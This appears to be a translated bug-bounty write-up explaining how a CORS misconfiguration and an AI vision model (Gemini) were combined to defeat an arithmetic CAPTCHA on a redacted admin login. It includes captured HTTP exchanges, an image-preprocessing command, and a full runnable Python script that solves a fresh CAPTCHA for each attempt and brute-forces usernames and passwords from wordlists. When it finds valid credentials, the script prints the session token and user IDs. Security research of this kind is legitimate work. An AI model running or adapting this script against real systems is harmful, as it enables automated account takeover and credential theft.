Bypassing CAPTCHA with AI Models

文化 · 2024-11-20 12:03 · South Korea


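Using AI to bypass CAPTCHA exposes latent vulnerabilities and reveals a critical weakness in web security.

Hi everyone, I'm ph-hitachi, a full-stack developer, DevOps engineer, and security researcher with experience in automation engineering and bug bounty automation. This year I have been exploring new attack vectors, focusing on modern tools and techniques and on how attackers might use them for exploitation.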

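Introduction:

With the rise of automation, AI-driven techniques have advanced significantly and are increasingly applied in cybersecurity. Recently I came across a case where AI was used to attack a system rather than protect it. This article explains in detail how an AI model, specifically generative AI, can be used to bypass CAPTCHA protection and take over accounts in a web application.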

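What is CAPTCHA?

CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. It is a widely used security mechanism designed to protect online services from automated abuse such as brute forcing, credential stuffing, and bot activity.
A CAPTCHA challenge usually presents a task that is easy for humans but hard for bots, such as identifying objects in a picture, reading distorted text, or solving a basic arithmetic problem.

The main purpose of CAPTCHA is to stop automated scripts or bots from performing harmful actions, such as repeatedly trying username and password combinations until a valid match is found. However, a CAPTCHA is only an effective defense if it cannot be bypassed or solved automatically.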

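Test overview:

We tested the platform with a combination of manual and automated tools. The testing process consisted of the following steps:

1. Extract the CAPTCHA image from the server.

2. Solve the CAPTCHA image automatically with an AI model.

3. Test the login page's resistance to brute forcing using the "cluster bomb" method.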
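The "cluster bomb" method in step 3 tries every combination of several payload lists. A minimal sketch of that idea, assuming two small placeholder wordlists (the usernames and passwords here are hypothetical and not from the original test), is a Cartesian product:

```python
from itertools import product


def cluster_bomb(usernames, passwords):
    """Return every (username, password) pair, in the same order as two nested loops."""
    return list(product(usernames, passwords))


# Placeholder wordlists, for illustration only.
pairs = cluster_bomb(["admin", "test"], ["123456", "password"])
print(len(pairs))  # 4
print(pairs[0])    # ('admin', '123456')
```

The number of attempts is the product of the list sizes, which is why a per-attempt CAPTCHA is expected to make this kind of attack impractical.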

Vulnerability discovery overview:

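Step 1: Identifying the CORS misconfiguration on the CAPTCHA endpoint

The first step in discovering this vulnerability was testing the security of the {BASE_URL}/admin-web/captcha/show endpoint. During testing I found that the endpoint had a CORS (Cross-Origin Resource Sharing) misconfiguration that allowed unauthorized origins to access sensitive resources such as CAPTCHA images.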

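By sending a simple HTTP request from an untrusted domain, I was able to retrieve the CAPTCHA image without any server-side origin validation. In the exchange below, the server reflects the attacker-controlled Origin in Access-Control-Allow-Origin and also sets Access-Control-Allow-Credentials: true.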

POST /admin-web/captcha/show HTTP/2
Host: [redacted].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [redacted].com
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Origin: http://attacker.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

sysId=1000

HTTP/2 200 OK
Content-Type: application/json
Date: Tue, 01 Oct 2024 01:28:11 GMT
X-Trace-Id: i100,i101001a441232779d64e6f88ea3b2040cfb43a
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://attacker.com
Access-Control-Expose-Headers: Set-Cookie
Access-Control-Allow-Credentials: true
X-Cache: Miss from cloudfront

{"img":"/9j/4AAQSkZJRgABAgAAAQABAAD(truncated)...","key":"code_xxxxxxxxxxx"}

This exposed CAPTCHA image became the entry point for the attack, because it could be fetched and processed automatically.
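From the defender's side, the pattern in the response above can be checked mechanically. The following is a rough sketch, not a complete CORS audit: the function name and the trusted-origin allowlist are assumptions made for illustration, while the header values are the ones shown in the captured response.

```python
def reflects_untrusted_origin(request_origin, response_headers, trusted_origins):
    """Return True if a response grants credentialed CORS access to an origin
    that is not on the allowlist (the misconfiguration described above)."""
    # Header names are case-insensitive, so normalize them first.
    headers = {name.lower(): value for name, value in response_headers.items()}
    allowed_origin = headers.get("access-control-allow-origin")
    with_credentials = headers.get("access-control-allow-credentials", "").lower() == "true"
    return (
        request_origin not in trusted_origins
        and allowed_origin == request_origin
        and with_credentials
    )


# Header values taken from the captured response; the allowlist is hypothetical.
captured = {
    "Access-Control-Allow-Origin": "http://attacker.com",
    "Access-Control-Allow-Credentials": "true",
}
print(reflects_untrusted_origin("http://attacker.com", captured, {"https://app.example.com"}))  # True
```

A server that only echoes origins from a fixed allowlist would make this check return False for http://attacker.com.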

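Step 2: Testing the authentication flow

After confirming that the CAPTCHA was exposed, the next step was to analyze the authentication flow. I tested the {BASE_URL}/admin-web/auth/authInfo endpoint, which is responsible for validating user credentials. Every login request must supply a username, a password, and the answer to the most recent CAPTCHA.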

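Once the request is sent, the server returns a response indicating whether the login succeeded. The request parameters are:

•loginName: the username being tested in the brute-force attack.

•loginPassword: the password being tested.

•captchaCode: the CAPTCHA answer (for example, if the CAPTCHA text is 6+3, captchaCode is 9).

•captchaKey: the key obtained from the initial CAPTCHA request.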
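Both endpoints accept application/x-www-form-urlencoded bodies. As a small illustration of how these fields are serialized, the sketch below uses Python's standard urllib.parse.urlencode; the username and password are placeholders, and the key is the redacted value from the captured response.

```python
from urllib.parse import urlencode

# Body of the CAPTCHA request shown earlier: 10 bytes, matching its Content-Length header.
captcha_body = urlencode({"sysId": "1000"})
print(captcha_body, len(captcha_body))  # sysId=1000 10

# Login form fields in the order listed above; the values are placeholders.
login_body = urlencode({
    "loginName": "alice",
    "loginPassword": "example-password",
    "captchaCode": "9",                # answer to the CAPTCHA "6+3"
    "captchaKey": "code_xxxxxxxxxxx",  # key returned together with the image
})
print(login_body)
```

Because captchaKey ties an answer to one specific image, each login attempt needs a freshly fetched CAPTCHA.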

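Step 3: Solving the CAPTCHA with an AI model

Initially, when I tried to solve the CAPTCHA with the AI model, I noticed that the default CAPTCHA images produced wrong answers because of their poor image quality. The CAPTCHA shows a simple arithmetic expression such as 6 + 4, but the AI misread it as a string of digits (for example "6743") instead of solving the expression.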

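To fix this, I applied image preprocessing to improve the clarity of the CAPTCHA, which allowed the AI to read it with 100% accuracy. The key was converting the image to black and white and sharpening it. I based this on the following command from https://mathieularose.com/decoding-captchas: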

$ convert captcha_image.png -gaussian-blur 0 -threshold 25% -paint 1 captcha_image-1.png

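Applying Gaussian blur, thresholding, and the paint operation sharpened the edges of the image and reduced noise, making the CAPTCHA more legible to the AI model.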
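To make the thresholding step concrete, here is a dependency-free sketch of what a 25% threshold does to grayscale pixels: values above 25% of full scale become white and everything else becomes black. It illustrates the idea only and is not how ImageMagick or Pillow implement it; the sample pixel values are made up.

```python
def threshold(gray_rows, percent=25):
    """Binarize a grayscale image given as rows of 0-255 integers."""
    cutoff = 255 * percent / 100  # 25% of full scale is 63.75
    return [[255 if value > cutoff else 0 for value in row] for row in gray_rows]


# Made-up 2x3 image: faint noise (10, 40, 63) is dropped, brighter pixels are kept.
sample = [
    [10, 40, 200],
    [63, 64, 255],
]
print(threshold(sample))  # [[0, 0, 255], [0, 255, 255]]
```

The demo script later in the article uses a fixed cutoff of 64 on a 0-255 scale, which is roughly the same 25% level.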

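After preprocessing, the AI model consistently produced accurate results and correctly solved arithmetic expressions such as 6 + 4. High accuracy at this step is critical to automating the CAPTCHA-solving process.

Step 4: Solving the CAPTCHA with a Python script

After retrieving the CAPTCHA image from the vulnerable endpoint and solving it with the AI model, the next step was to automate the process with a script.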

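Step 5: Implementing the brute-force attack

Using wordlists, run a brute-force attack against the login endpoint with the extracted CAPTCHA code and key.

Script implementation overview

Step 1: Send the first HTTP request to get the CAPTCHA:

•Send a POST request to /admin-web/captcha/show to obtain the CAPTCHA image (as a Base64-encoded string) and its corresponding key.

Step 2: Decode and process the image:

•Take the Base64 image data from the response, process it with the Pillow imaging library as described above, and use the AI model to extract the text from the CAPTCHA image.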
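As a quick sanity check on the decoding in step 2, the truncated img value from the captured response can be decoded far enough to identify the image format. The sketch below uses only the standard library; the helper name is an assumption, and the input is the visible prefix of the sample, not a full image.

```python
import base64


def decode_prefix(b64_text):
    """Decode as much of a truncated Base64 string as forms complete 4-character groups."""
    usable = len(b64_text) - len(b64_text) % 4
    return base64.b64decode(b64_text[:usable])


# Visible prefix of the "img" field in the captured response.
header = decode_prefix("/9j/4AAQSkZJRgABAgAAAQABAAD")
print(header[:3] == b"\xff\xd8\xff")  # True: JPEG start-of-image marker
print(header[6:10])                   # b'JFIF'
```

The leading bytes show that the endpoint returns a JPEG (JFIF) image, which Pillow can open directly from the decoded bytes.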

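Step 3: Solve the CAPTCHA:

•Parse the text returned by the AI model. If it represents an arithmetic problem (for example 6 + 4 = ?), evaluate the expression to get the CAPTCHA answer.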
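Evaluating the recognized text does not require eval(). A minimal sketch, assuming the CAPTCHA always has the form "integer operator integer" (the function name and the integer handling of division are assumptions for illustration):

```python
import operator
import re

OPERATORS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}


def solve_arithmetic(text):
    """Find the first '<int> <op> <int>' in the text and return its value as a string,
    or None if no such expression is present."""
    match = re.search(r"(\d+)\s*([+\-*/])\s*(\d+)", text)
    if match is None:
        return None
    left, symbol, right = match.groups()
    if symbol == "/" and int(right) == 0:
        return None  # avoid division by zero on a misread image
    result = OPERATORS[symbol](int(left), int(right))
    if isinstance(result, float) and result.is_integer():
        result = int(result)  # report 8 / 2 as "4" rather than "4.0"
    return str(result)


print(solve_arithmetic("6 + 4 = ?"))  # 10
print(solve_arithmetic("6743"))       # None
```

Restricting the input to a fixed grammar means that unexpected model output, such as the misread "6743", is rejected instead of being executed.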

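Step 4: Brute force with a dictionary attack:

•Send POST requests to /admin-web/auth/authInfo with different username and password combinations, including the CAPTCHA answer (captchaCode) and the CAPTCHA key (captchaKey, from step 1).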

Demo script:

#!/usr/bin/env python3
import argparse
import base64
import operator
import os
import re
import sys
import time  # Used for the retry delay
from io import BytesIO

import google.generativeai as genai
import requests
from colorama import Fore, init
from google.api_core.exceptions import ResourceExhausted  # Raised when the API quota is exceeded
from PIL import Image, ImageFilter
from tqdm import tqdm  # Real-time progress bar

# Initialize colorama
init(autoreset=True)

# Configure API key for Google Generative AI
genai.configure(api_key=os.environ['GEMINI_API_KEY'])

# Define constants
BASE_URL = "https://[REDACTED].com"
CAPTCHA_URL = f"{BASE_URL}/admin-web/captcha/show"
AUTH_URL = f"{BASE_URL}/admin-web/auth/authInfo"
SYS_ID = "1000"  # System ID
RETRY_LIMIT = 5  # Retry limit for handling quota exhaustion

# Arithmetic operators accepted in a CAPTCHA expression
OPERATORS = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv}


# Step 1: Send First HTTP Request to Get the Captcha
def get_captcha():
    payload = {'sysId': SYS_ID}
    response = requests.post(CAPTCHA_URL, headers={
        'Content-Type': 'application/x-www-form-urlencoded'
    }, data=payload)

    if response.status_code == 200:
        return response.json()
    raise Exception("Failed to retrieve CAPTCHA")


# Step 2: Decode the Image and Apply Gaussian blur, thresholding, and painting
def process_captcha(captcha_data):
    # Decode the base64 image
    image_data = base64.b64decode(captcha_data["img"])
    image_pil = Image.open(BytesIO(image_data))

    # Image processing: grayscale, then binarize at 64 (about 25% of 255)
    image_blurred = image_pil.filter(ImageFilter.GaussianBlur(0))  # No blur
    image_gray = image_blurred.convert("L")
    threshold_value = 64
    image_threshold = image_gray.point(lambda p: 255 if p > threshold_value else 0)

    # Optional: Enhance and smooth the image
    image_painted = image_threshold.filter(ImageFilter.EDGE_ENHANCE).filter(ImageFilter.SMOOTH)

    return image_painted


# Step 3: Solve the Captcha
def solve_captcha(image, retry_count=0):
    # Generate the content using the AI model
    prompt = "Extract the text from this image."
    model = genai.GenerativeModel(model_name="gemini-1.5-flash")

    try:
        response = model.generate_content([prompt, image])

        # Check if the response has candidates and extract the text
        if response.candidates and response.candidates[0].content.parts:
            return response.candidates[0].content.parts[0].text.strip()

        # finish_reason belongs to a single candidate, not to the candidates list
        reason = response.candidates[0].finish_reason if response.candidates else "no candidates"
        print(f"\n{Fore.RED}Error: CAPTCHA solving was not successful for reason: {reason}")
        return None
    except ResourceExhausted:
        # Handle resource exhaustion by retrying with a delay
        if retry_count < RETRY_LIMIT:
            print(f"\n{Fore.RED}Quota exceeded. Retrying in 30 seconds... (Attempt {retry_count + 1}/{RETRY_LIMIT})")
            time.sleep(30)  # Wait for 30 seconds before retrying
            return solve_captcha(image, retry_count + 1)
        print(f"\n{Fore.RED}Quota exhausted and retry limit reached. Exiting.")
        sys.exit(1)
    except AttributeError as e:
        # Handle attribute error in case of incorrect response fields
        print(f"\n{Fore.RED}AttributeError: Possibly incorrect field in the response. Check for proper API handling.")
        print(f"\nError details: {e}")
        return None


# Evaluate a math expression of the form "<int> <op> <int>" without calling eval() on model output
def evaluate_math_expression(expression):
    match = re.fullmatch(r'\s*(\d+)\s*([+\-*/])\s*(\d+)\s*', expression)
    if match is None:
        print(f"\nError evaluating expression: unsupported format {expression!r}")
        return None
    left, symbol, right = match.groups()
    try:
        return str(OPERATORS[symbol](int(left), int(right)))
    except ZeroDivisionError as e:
        print(f"\nError evaluating expression: {e}")
        return None


# Step 4: Use a Cluster Bomb Attack with Wordlist
def brute_force_login(username, password, attempt_count, total_attempts, progress_bar):
    # Get a new CAPTCHA for every login attempt
    captcha_data = get_captcha()
    captcha_image = process_captcha(captcha_data)
    captcha_text = solve_captcha(captcha_image)

    # Check if the CAPTCHA was successfully solved
    if captcha_text is None:
        print(f"\n{Fore.RED}Failed to solve CAPTCHA. Skipping this attempt.")
        return  # Skip this login attempt

    # Find the math expression in the text
    math_expression = re.search(r'(\d+\s*[\+\-\*\/]\s*\d+)', captcha_text)

    if math_expression:
        captcha_code = evaluate_math_expression(math_expression.group(0))
        captcha_key = captcha_data["key"]

        # Construct the payload for login attempt
        payload = {
            'loginName': username,
            'loginPassword': password,
            'sysId': SYS_ID,
            'captchaCode': captcha_code,
            'captchaKey': captcha_key,
            'loginVersion': 'v5',
            'noTgAuth': 'v1'
        }

        # Make the login attempt request
        response = requests.post(AUTH_URL, headers={
            'Content-Type': 'application/x-www-form-urlencoded'
        }, data=payload)

        response_json = response.json()

        # Only print success messages (when the response content is greater than 2000 bytes)
        if len(response.content) > 2000:
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + f"TraceID: {Fore.YELLOW}{response_json.get('traceId', 'N/A')}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "Credentials match:")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Username: {Fore.GREEN}{username}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Password: {Fore.GREEN}{password}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Content: {Fore.GREEN}{math_expression.group(0)}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Code: {Fore.GREEN}{captcha_code}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Key: {Fore.GREEN}{captcha_key}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "User Information:")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Merchant ID: {Fore.GREEN}{response_json['data'].get('merId', 'N/A')}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User Name: {Fore.GREEN}{response_json['data'].get('loginName', 'N/A')}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User ID: {Fore.GREEN}{response_json['data'].get('userId', 'N/A')}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Role ID: {Fore.GREEN}{response_json['data'].get('roleId', 'N/A')}")
            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"X-Token: {Fore.GREEN}{response_json['data'].get('token', 'N/A')}")

            return response_json

    # Update progress bar for failed attempts (without printing the failure message)
    progress_bar.update(1)

    # Introduce delay between each brute force attempt to avoid overloading the API
    # time.sleep(REQUEST_DELAY)


# Load usernames or passwords from a file
def load_wordlist(file_path):
    with open(file_path, 'r') as file:
        return [line.strip() for line in file]


# Main execution
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Brute force login script with CAPTCHA solving.')
    parser.add_argument('--username', required=True, help='Path to the file containing usernames (one per line) or a single username string.')
    parser.add_argument('--password', required=True, help='Path to the file containing passwords (one per line) or a single password string.')

    args = parser.parse_args()

    # Load username and password wordlists or single strings
    username_list = load_wordlist(args.username) if os.path.isfile(args.username) else [args.username]
    password_list = load_wordlist(args.password) if os.path.isfile(args.password) else [args.password]

    total_attempts = len(username_list) * len(password_list)
    attempt_count = 0

    # Initialize progress bar
    with tqdm(total=total_attempts, desc="Brute Force Attack", ncols=100, ascii=True, colour="yellow") as progress_bar:
        # Perform brute-force login attempts
        for username in username_list:
            for password in password_list:
                brute_force_login(username, password, attempt_count, total_attempts, progress_bar)
                attempt_count += 1

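The content above was translated and compiled by 白帽子左一. Original article: https://infosecwriteups.com/utilizing-ai-model-for-hacking-bypassing-captchas-using-ai-leads-to-account-takeover-bug-bounty-028804b779a0

Disclaimer: The techniques, ideas, and tools described in this article are intended solely for security-focused learning and exchange. No one may use them for illegal purposes or for profit; anyone who does so bears the consequences. All penetration testing requires authorization!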
